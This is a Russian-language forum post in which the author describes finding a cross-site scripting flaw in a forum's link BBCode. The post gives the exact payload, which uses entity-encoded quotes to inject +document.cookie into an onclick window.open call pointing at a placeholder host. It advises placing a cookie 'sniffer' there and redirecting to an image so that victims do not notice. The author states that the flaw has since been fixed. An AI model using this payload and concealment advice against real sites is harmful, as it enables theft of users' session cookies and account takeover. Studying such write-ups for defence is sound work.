Как начался мой поиск уязвимости:
Просто мне сразу не очень понравилась идея мо скриптизацией форума, отчасти из за того что это сложнее защитить, и ещё потаму что я стараюсь практически не использовать js.
Kill JavaScript И чтож, я решил проверить, насколько безопастдо это сделано, я тутже подставил в ссылку ' естественно это не прокатило, а так как я читал перед этим статьи с главной страници ачата, я вспомнил что если в js подставлять символы в виде
&#HH, и они будут воспринематься как обычные символы, я подставил
' но или я читал не очень внимательно или там небыло написанно про то что ; после этого символа не только не воспринемается но и закрывает его, во всяком случае символ ; не указан в нижней таблице
Взлом чатов by Algol. Теория и Практика. (страница 2), когда я подставил туда
' форум заменил символ
& на
&, на этом я и прекратил поиски.
Потом я гдкто увиде, что можно и нужно писать их все с ; (все имел введу таблицу), я подставил,
' и увидел его в сорцах таким как и подставил, и я не долго думая закрыл открытую кавычку адреса подставил любимую переменную и сново открыл кавычку, чтобы форум её закрыл сам, в ркзультаттк получилась такая строка.
[
url=http://xxx.yyy/zzz.php?
'
+document.cookie
+
'ok]Test[/url]
результат:
<span title="Безопасная ссылка, Referer не передается: http://xxx.yyy/zzz.php?
'
+document.cookie
+
'ok" style="text-decoration:underline; cursor: pointer;" onclick="window.open('http://xxx.yyy/zzz.php?
'
+document.cookie
+
'ok');">Test</span>
Как видно из примера, в скрипте
"http://xxx.yyy/zzz.php" можно поставить снифер, а можно тудаже и редирект например на картинку, тогда никто не догалался бы что это снифер
.
P.S. Я повыделял это красным потому что форум фильтрует эти симыолы, а если их разделить другим тэго то всё норм 
P.P.S. Уязвимость, на данный момент, исправлена